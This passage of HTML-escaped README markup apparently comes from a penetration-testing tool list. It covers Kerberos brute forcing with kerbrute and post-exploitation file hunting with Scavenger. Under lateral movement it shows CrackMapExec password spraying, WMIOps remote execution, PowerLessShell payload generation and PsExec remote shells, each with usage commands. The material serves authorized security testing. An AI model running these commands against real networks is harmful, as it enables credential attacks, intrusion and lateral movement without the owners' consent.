thoffman\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Brute Force\u003c/span\u003e\n./kerbrute -d lab.ropnop.com bruteforce -\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://matthewomccorkle.github.io/day_032_kerbrute/\" rel=\"nofollow\"\u003ehttps://matthewomccorkle.github.io/day_032_kerbrute/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/SpiderLabs/scavenger\"\u003escavenger\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-scavenger\" class=\"anchor\" aria-label=\"Permalink: 🔙scavenger\" href=\"#scavenger\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp 
dir=\"auto\"\u003eScavenger is a multi-threaded post-exploitation scanning tool for scavenging systems, finding most frequently used files and folders as well as \"interesting\" files containing sensitive information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eScavenger confronts a challenging issue typically faced by Penetration Testing consultants during internal penetration tests; the issue of having too much access to too many systems with limited days for testing.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFirst install CrackMapExec from \u003ca href=\"https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/SpiderLabs/scavenger\ncd scavenger\"\u003e\u003cpre\u003egit clone https://github.com/SpiderLabs/scavenger\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e scavenger\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Search for interesting files on victim endpoint\npython3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Search for interesting files on victim endpoint\u003c/span\u003e\npython3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice \u003ca href=\"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/\" rel=\"nofollow\"\u003eblog 
post\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/216736914-e7a7fe26-3531-4ae1-9962-fce130d8ab62.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/\" rel=\"nofollow\"\u003ehttps://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/scavenger-post-exploitation-tool-for-collecting-vital-data/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eLateral Movement\u003c/h1\u003e\u003ca id=\"user-content-lateral-movement\" class=\"anchor\" aria-label=\"Permalink: Lateral Movement\" href=\"#lateral-movement\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Porchetta-Industries/CrackMapExec\"\u003ecrackmapexec\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-crackmapexec\" class=\"anchor\" aria-label=\"Permalink: 🔙crackmapexec\" href=\"#crackmapexec\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis is a great tool for pivoting in a Windows/Active Directory environment using credential pairs (username:password, username:hash). 
It also offered other features including enumerating logged on users and spidering SMB shares to executing psexec style attacks, auto-injecting Mimikatz/Shellcode/DLL’s into memory using Powershell, dumping the NTDS.dit and more.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install crackmapexec\"\u003e\u003cpre\u003esudo apt install crackmapexec\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"crackmapexec smb \u0026lt;ip address\u0026gt; -d \u0026lt;domain\u0026gt; -u \u0026lt;user list\u0026gt; -p \u0026lt;password list\u0026gt;\"\u003e\u003cpre\u003ecrackmapexec smb \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eip address\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -d \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003edomain\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -u \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003euser list\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -p \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003epassword list\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070626-4549ec06-e2c5-477b-a97d-0f29e48bbfbc.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" 
dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/FortyNorthSecurity/WMIOps\"\u003eWMIOps\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-wmiops\" class=\"anchor\" aria-label=\"Permalink: 🔙WMIOps\" href=\"#wmiops\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWMIOps is a powershell script that uses WMI to perform a variety of actions on hosts, local or remote, within a Windows environment.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDeveloped by \u003ca href=\"https://twitter.com/christruncer\" rel=\"nofollow\"\u003e@christruncer\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOriginal \u003ca href=\"https://www.christophertruncer.com/introducing-wmi-ops/\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e documenting release.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/FortyNorthSecurity/WMIOps\nImport-Module WMIOps.ps1\"\u003e\u003cpre\u003egit clone 
https://github.com/FortyNorthSecurity/WMIOps\nImport-Module WMIOps.ps1\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Executes a user specified command on the target machine\nInvoke-ExecCommandWMI\n\n# Returns all running processes from the target machine\nGet-RunningProcessesWMI\n\n# Checks if a user is active at the desktop on the target machine (or if away from their machine)\nFind-ActiveUsersWMI\n\n# Lists all local and network connected drives on target system\nGet-SystemDrivesWMI\n\n# Executes a powershell script in memory on the target host via WMI and returns the output\nInvoke-RemoteScriptWithOutput\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Executes a user specified command on the target machine\u003c/span\u003e\nInvoke-ExecCommandWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Returns all running processes from the target machine\u003c/span\u003e\nGet-RunningProcessesWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Checks if a user is active at the desktop on the target machine (or if away from their machine)\u003c/span\u003e\nFind-ActiveUsersWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Lists all local and network connected drives on target system\u003c/span\u003e\nGet-SystemDrivesWMI\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Executes a powershell script in memory on the target host via WMI and returns the output\u003c/span\u003e\nInvoke-RemoteScriptWithOutput\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" 
href=\"https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266302-9c098f03-24fd-4f91-af63-db2fe04c01c7.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266314-e51c7c99-1e2a-473e-926c-074b56fe79a5.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImages used from \u003ca href=\"https://pentestlab.blog/2017/11/20/command-and-control-wmi/\" rel=\"nofollow\"\u003ehttps://pentestlab.blog/2017/11/20/command-and-control-wmi/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Mr-Un1k0d3r/PowerLessShell\"\u003ePowerLessShell\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-powerlessshell\" class=\"anchor\" aria-label=\"Permalink: 🔙PowerLessShell\" href=\"#powerlessshell\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 
1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool that uses MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/Mr-Un1k0d3r/PowerLessShell\ncd PowerLessShell\"\u003e\u003cpre\u003egit clone https://github.com/Mr-Un1k0d3r/PowerLessShell\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e PowerLessShell\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Help\npython PowerLessShell.py -h\n\n# Generate PowerShell payload \npython PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\n\n# Generating a shellcode payload\npython PowerLessShell.py -source shellcode.raw -output malicious.csproj\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Help\u003c/span\u003e\npython PowerLessShell.py -h\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate PowerShell payload \u003c/span\u003e\npython PowerLessShell.py -type powershell -source script.ps1 -output malicious.csproj\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generating a shellcode payload\u003c/span\u003e\npython PowerLessShell.py -source shellcode.raw -output malicious.csproj\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca 
href=\"https://github.com/Mr-Un1k0d3r/PowerLessShell#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266357-75a3f09d-9855-46d5-ad13-69c677b4499f.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628\" rel=\"nofollow\"\u003ehttps://bank-security.medium.com/how-to-running-powershell-commands-without-powershell-exe-a6a19595f628\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://learn.microsoft.com/en-us/sysinternals/downloads/psexec\" rel=\"nofollow\"\u003ePsExec\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-psexec\" class=\"anchor\" aria-label=\"Permalink: 🔙PsExec\" href=\"#psexec\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ePsExec is a part of the Sysinternals suite of tools, which is a collection of utilities for managing and troubleshooting Windows systems.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt is great for remotely executing commands on target machines.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e Some AVs detect PsExec as a 'remote admin' virus.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (PowerShell)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Invoke-WebRequest -Uri 'https://download.sysinternals.com/files/PSTools.zip' -OutFile 'pstools.zip'\nExpand-Archive -Path 'pstools.zip' -DestinationPath \u0026quot;$env:TEMP\\pstools\u0026quot;\nMove-Item -Path \u0026quot;$env:TEMP\\pstools\\psexec.exe\u0026quot; .\nRemove-Item -Path \u0026quot;$env:TEMP\\pstools\u0026quot; -Recurse\"\u003e\u003cpre\u003eInvoke-WebRequest -Uri \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ehttps://download.sysinternals.com/files/PSTools.zip\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -OutFile \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epstools.zip\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e\nExpand-Archive -Path \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003epstools.zip\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e -DestinationPath \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$env\u003c/span\u003e:TEMP\\pstools\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\nMove-Item -Path \u003cspan class=\"pl-s\"\u003e\u003cspan 
class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$env\u003c/span\u003e:TEMP\\pstools\\psexec.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e.\u003c/span\u003e\nRemove-Item -Path \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$env\u003c/span\u003e:TEMP\\pstools\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -Recurse\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Prevent the license agreement from being displayed\npsexec.exe /accepteula\n\n# Run the 'hostname' command on remote machine\npsexec.exe \\\\REMOTECOMPUTER hostname\n\n# Run the 'hostname' command on EVERYTHING (on the domain)\npsexec.exe \\\\* hostname\n\n# Run a local executable on a remote machine\npsexec.exe \\\\REMOTECOMPUTER -c C:\\Tools\\program.exe\n\n# Run the 'hostname' command with different credentials\npsexec.exe \\\\REMOTECOMPUTER hostname -u localadmin -p secret-p@$$word\n\n# Spawn shell on remote machine\npsexec.exe -s \\\\REMOTECOMPUTER cmd\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Prevent the license agreement from being displayed\u003c/span\u003e\npsexec.exe /accepteula\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the 'hostname' command on remote machine\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER hostname\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the 'hostname' command on EVERYTHING (on the domain)\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003e\u003cspan 
class=\"pl-k\"\u003e*\u003c/span\u003e hostname\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run a local executable on a remote machine\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER -c C:\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eools\u003cspan class=\"pl-cce\"\u003e\\p\u003c/span\u003erogram.exe\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run the 'hostname' command with different credentials\u003c/span\u003e\npsexec.exe \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER hostname -u localadmin -p secret-p@\u003cspan class=\"pl-smi\"\u003e$$\u003c/span\u003eword\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Spawn shell on remote machine\u003c/span\u003e\npsexec.exe -s \u003cspan class=\"pl-cce\"\u003e\\\\\u003c/span\u003eREMOTECOMPUTER cmd\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e \u003ccode\u003e-u\u003c/code\u003e/\u003ccode\u003e-p\u003c/code\u003e put the password on the command line, where it is visible in process listings and command-line auditing on the machine you run PsExec from; omit \u003ccode\u003e-p\u003c/code\u003e and PsExec prompts for it instead. \u003ccode\u003e\\\\*\u003c/code\u003e runs the command on every computer in the domain in one go, so scope it explicitly on an engagement. \u003ccode\u003e-s\u003c/code\u003e runs the remote process as SYSTEM. PsExec needs local administrator rights on the target: it copies its service binary to the target's \u003ccode\u003eADMIN$\u003c/code\u003e share and registers a service, which is what most AV/EDR products key on. The install step above downloads the binary with no integrity check, so verify it before use with \u003ccode\u003eGet-AuthenticodeSignature .\\psexec.exe\u003c/code\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eGreat \u003ca href=\"https://adamtheautomator.com/psexec/\" rel=\"nofollow\"\u003eblog post\u003c/a\u003e on PsExec usage.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266376-8daa51d6-16d4-4422-b723-d1bc8b7f22e2.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://adamtheautomator.com/psexec/\" rel=\"nofollow\"\u003ehttps://adamtheautomator.com/psexec/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca 
